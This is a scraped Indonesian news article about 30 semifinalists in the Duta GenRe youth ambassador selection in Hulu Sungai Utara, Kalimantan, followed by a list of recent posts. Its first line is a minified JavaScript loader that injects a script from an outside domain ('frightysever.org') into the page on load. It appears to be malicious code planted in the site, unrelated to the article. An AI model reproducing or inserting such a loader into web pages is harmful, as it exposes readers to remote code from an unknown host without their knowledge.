(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Masuk Semi Final, 30 Calon Duta GenRe HSU Menuju Grand Final


KANALKALIMANTAN.COM, AMUNTAI – Sebanyak 30 calon Duta GenRe (Generasi Berencana) Kabupaten Hulu Sungai Utara (HSU) memasuki tahap babak semi final. Mereka siap masuk tahap babak final yang akan digelar pada 27 Agustus 2022 mendatang.

Ketua panitia pelaksana, Ridha Rahmatina mengatakan, para peserta yang berhasil masuk ke babak semi final menunjukkan pemahamannya dengan cara presentasi di depan dewan juri tentang pencegahan stunting, hingga pernikahan usia dini.

“Pada pembahasan semi final ini membahas tentang GenRe, diantaranya triad KRR, pendewasaan usia perkawinan, dan lain-lain,” kata Rahmatina sela kegiatan yang berlangsung di Aula DPPKB HSU, Sabtu (23/7/2022).

Mengambil tema “Remaja Bersatu, Duta GenRe HSU Semakin Maju”, Rahmatina mengharapkan para remaja bisa mempresentasikan kepada masyarakat tentang program GenRe.

 

Baca juga  : 624 Pesepeda Jajal “Tour de Loksado 2022”, Uji Ketahanan Trek Sepanjang 165 Km

Pemiliham Duta GenRe sendiri bertujuan untuk meningkatkan kualitas pelaksanaan pemberian akses informasi, pendidikan dan konseling kesehatan reproduksi, gizi dan perencanaan kehidupan berkeluarga bagi remaja dan pendidik sebaya.

Calon Duta GenRe HSU tahun 2022 terpilih, bisa lebih aktif, kreatif dan produktif yang mampu bermanfaat bagi diri sendiri maupun masyarakat.
“Sehingga diharapkan seorang remaja bisa menjadi orang yang aktif dan kreatif dalam menyampaikan informasi ke teman sebayanya,” anjurnya.

Setelah melalui beberapa tahapan, seperti wawancara dan semi final, para peserta pemilihan Duta GenRe dijadwalkan mengikuti babak grand final pada Sabtu 27 Agustus 2022 di aula Dr KH Idham Chalid. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

42 menit ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

3 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

4 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

18 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

20 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

22 jam ago

This website uses cookies.